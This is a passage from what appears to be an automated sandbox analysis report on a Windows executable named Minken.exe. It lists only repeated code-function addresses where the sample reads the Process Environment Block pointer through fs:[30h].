Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]	12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D34C mov eax, dword ptr fs:[00000030h]	12_2_2314D34C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D34C mov eax, dword ptr fs:[00000030h]	12_2_2314D34C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225341 mov eax, dword ptr fs:[00000030h]	12_2_23225341
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231F437C mov eax, dword ptr fs:[00000030h]	12_2_231F437C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157370 mov eax, dword ptr fs:[00000030h]	12_2_23157370
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157370 mov eax, dword ptr fs:[00000030h]	12_2_23157370
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157370 mov eax, dword ptr fs:[00000030h]	12_2_23157370
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321A352 mov eax, dword ptr fs:[00000030h]	12_2_2321A352
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231A739A mov eax, dword ptr fs:[00000030h]	12_2_231A739A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231A739A mov eax, dword ptr fs:[00000030h]	12_2_231A739A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23148397 mov eax, dword ptr fs:[00000030h]	12_2_23148397
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23148397 mov eax, dword ptr fs:[00000030h]	12_2_23148397
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23148397 mov eax, dword ptr fs:[00000030h]	12_2_23148397
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317438F mov eax, dword ptr fs:[00000030h]	12_2_2317438F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317438F mov eax, dword ptr fs:[00000030h]	12_2_2317438F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314E388 mov eax, dword ptr fs:[00000030h]	12_2_2314E388
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314E388 mov eax, dword ptr fs:[00000030h]	12_2_2314E388
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314E388 mov eax, dword ptr fs:[00000030h]	12_2_2314E388
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231733A5 mov eax, dword ptr fs:[00000030h]	12_2_231733A5
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231833A0 mov eax, dword ptr fs:[00000030h]	12_2_231833A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231833A0 mov eax, dword ptr fs:[00000030h]	12_2_231833A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322539D mov eax, dword ptr fs:[00000030h]	12_2_2322539D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F3E6 mov eax, dword ptr fs:[00000030h]	12_2_2320F3E6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]	12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]	12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]	12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]	12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]	12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]	12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231583C0 mov eax, dword ptr fs:[00000030h]	12_2_231583C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231583C0 mov eax, dword ptr fs:[00000030h]	12_2_231583C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231583C0 mov eax, dword ptr fs:[00000030h]	12_2_231583C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231583C0 mov eax, dword ptr fs:[00000030h]	12_2_231583C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D63C0 mov eax, dword ptr fs:[00000030h]	12_2_231D63C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232253FC mov eax, dword ptr fs:[00000030h]	12_2_232253FC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E3F0 mov eax, dword ptr fs:[00000030h]	12_2_2316E3F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E3F0 mov eax, dword ptr fs:[00000030h]	12_2_2316E3F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E3F0 mov eax, dword ptr fs:[00000030h]	12_2_2316E3F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231863FF mov eax, dword ptr fs:[00000030h]	12_2_231863FF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320C3CD mov eax, dword ptr fs:[00000030h]	12_2_2320C3CD
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320B3D0 mov ecx, dword ptr fs:[00000030h]	12_2_2320B3D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]	12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]	12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]	12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]	12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]	12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]	12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]	12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]	12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225227 mov eax, dword ptr fs:[00000030h]	12_2_23225227
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23187208 mov eax, dword ptr fs:[00000030h]	12_2_23187208
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23187208 mov eax, dword ptr fs:[00000030h]	12_2_23187208
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314823B mov eax, dword ptr fs:[00000030h]	12_2_2314823B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A250 mov eax, dword ptr fs:[00000030h]	12_2_2314A250
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321D26B mov eax, dword ptr fs:[00000030h]	12_2_2321D26B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321D26B mov eax, dword ptr fs:[00000030h]	12_2_2321D26B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23156259 mov eax, dword ptr fs:[00000030h]	12_2_23156259
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149240 mov eax, dword ptr fs:[00000030h]	12_2_23149240
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149240 mov eax, dword ptr fs:[00000030h]	12_2_23149240
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318724D mov eax, dword ptr fs:[00000030h]	12_2_2318724D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D8243 mov eax, dword ptr fs:[00000030h]	12_2_231D8243
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D8243 mov ecx, dword ptr fs:[00000030h]	12_2_231D8243
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23179274 mov eax, dword ptr fs:[00000030h]	12_2_23179274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23191270 mov eax, dword ptr fs:[00000030h]	12_2_23191270
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23191270 mov eax, dword ptr fs:[00000030h]	12_2_23191270
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154260 mov eax, dword ptr fs:[00000030h]	12_2_23154260
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154260 mov eax, dword ptr fs:[00000030h]	12_2_23154260
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154260 mov eax, dword ptr fs:[00000030h]	12_2_23154260
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320B256 mov eax, dword ptr fs:[00000030h]	12_2_2320B256
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320B256 mov eax, dword ptr fs:[00000030h]	12_2_2320B256
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314826B mov eax, dword ptr fs:[00000030h]	12_2_2314826B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318329E mov eax, dword ptr fs:[00000030h]	12_2_2318329E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318329E mov eax, dword ptr fs:[00000030h]	12_2_2318329E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232192A6 mov eax, dword ptr fs:[00000030h]	12_2_232192A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232192A6 mov eax, dword ptr fs:[00000030h]	12_2_232192A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232192A6 mov eax, dword ptr fs:[00000030h]	12_2_232192A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232192A6 mov eax, dword ptr fs:[00000030h]	12_2_232192A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318E284 mov eax, dword ptr fs:[00000030h]	12_2_2318E284
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318E284 mov eax, dword ptr fs:[00000030h]	12_2_2318E284
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D0283 mov eax, dword ptr fs:[00000030h]	12_2_231D0283
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D0283 mov eax, dword ptr fs:[00000030h]	12_2_231D0283
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D0283 mov eax, dword ptr fs:[00000030h]	12_2_231D0283
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225283 mov eax, dword ptr fs:[00000030h]	12_2_23225283
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D92BC mov eax, dword ptr fs:[00000030h]	12_2_231D92BC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D92BC mov eax, dword ptr fs:[00000030h]	12_2_231D92BC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D92BC mov ecx, dword ptr fs:[00000030h]	12_2_231D92BC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D92BC mov ecx, dword ptr fs:[00000030h]	12_2_231D92BC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602A0 mov eax, dword ptr fs:[00000030h]	12_2_231602A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602A0 mov eax, dword ptr fs:[00000030h]	12_2_231602A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0 mov eax, dword ptr fs:[00000030h]	12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0 mov eax, dword ptr fs:[00000030h]	12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0 mov eax, dword ptr fs:[00000030h]	12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0 mov eax, dword ptr fs:[00000030h]	12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]	12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov ecx, dword ptr fs:[00000030h]	12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]	12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]	12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]	12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]	12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E72A0 mov eax, dword ptr fs:[00000030h]	12_2_231E72A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E72A0 mov eax, dword ptr fs:[00000030h]	12_2_231E72A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232252E2 mov eax, dword ptr fs:[00000030h]	12_2_232252E2
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317F2D0 mov eax, dword ptr fs:[00000030h]	12_2_2317F2D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317F2D0 mov eax, dword ptr fs:[00000030h]	12_2_2317F2D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B2D3 mov eax, dword ptr fs:[00000030h]	12_2_2314B2D3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B2D3 mov eax, dword ptr fs:[00000030h]	12_2_2314B2D3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B2D3 mov eax, dword ptr fs:[00000030h]	12_2_2314B2D3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231592C5 mov eax, dword ptr fs:[00000030h]	12_2_231592C5
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231592C5 mov eax, dword ptr fs:[00000030h]	12_2_231592C5
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]	12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]	12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]	12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]	12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]	12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]	12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]	12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]	12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]	12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]	12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]	12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]	12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F2F8 mov eax, dword ptr fs:[00000030h]	12_2_2320F2F8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231492FF mov eax, dword ptr fs:[00000030h]	12_2_231492FF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602E1 mov eax, dword ptr fs:[00000030h]	12_2_231602E1
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602E1 mov eax, dword ptr fs:[00000030h]	12_2_231602E1
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602E1 mov eax, dword ptr fs:[00000030h]	12_2_231602E1
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118 mov ecx, dword ptr fs:[00000030h]	12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118 mov eax, dword ptr fs:[00000030h]	12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118 mov eax, dword ptr fs:[00000030h]	12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118 mov eax, dword ptr fs:[00000030h]	12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B136 mov eax, dword ptr fs:[00000030h]	12_2_2314B136
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B136 mov eax, dword ptr fs:[00000030h]	12_2_2314B136
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B136 mov eax, dword ptr fs:[00000030h]	12_2_2314B136
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B136 mov eax, dword ptr fs:[00000030h]	12_2_2314B136
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23151131 mov eax, dword ptr fs:[00000030h]	12_2_23151131
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23151131 mov eax, dword ptr fs:[00000030h]	12_2_23151131
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23210115 mov eax, dword ptr fs:[00000030h]	12_2_23210115
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23180124 mov eax, dword ptr fs:[00000030h]	12_2_23180124
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23156154 mov eax, dword ptr fs:[00000030h]	12_2_23156154
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23156154 mov eax, dword ptr fs:[00000030h]	12_2_23156154
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314C156 mov eax, dword ptr fs:[00000030h]	12_2_2314C156
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E8158 mov eax, dword ptr fs:[00000030h]	12_2_231E8158
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157152 mov eax, dword ptr fs:[00000030h]	12_2_23157152
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov eax, dword ptr fs:[00000030h]	12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov eax, dword ptr fs:[00000030h]	12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov ecx, dword ptr fs:[00000030h]	12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov eax, dword ptr fs:[00000030h]	12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov eax, dword ptr fs:[00000030h]	12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149148 mov eax, dword ptr fs:[00000030h]	12_2_23149148
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149148 mov eax, dword ptr fs:[00000030h]	12_2_23149148
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149148 mov eax, dword ptr fs:[00000030h]	12_2_23149148
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149148 mov eax, dword ptr fs:[00000030h]	12_2_23149148
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E3140 mov eax, dword ptr fs:[00000030h]	12_2_231E3140
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E3140 mov eax, dword ptr fs:[00000030h]	12_2_231E3140
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E3140 mov eax, dword ptr fs:[00000030h]	12_2_231E3140
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E9179 mov eax, dword ptr fs:[00000030h]	12_2_231E9179
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225152 mov eax, dword ptr fs:[00000030h]	12_2_23225152
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D019F mov eax, dword ptr fs:[00000030h]	12_2_231D019F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D019F mov eax, dword ptr fs:[00000030h]	12_2_231D019F
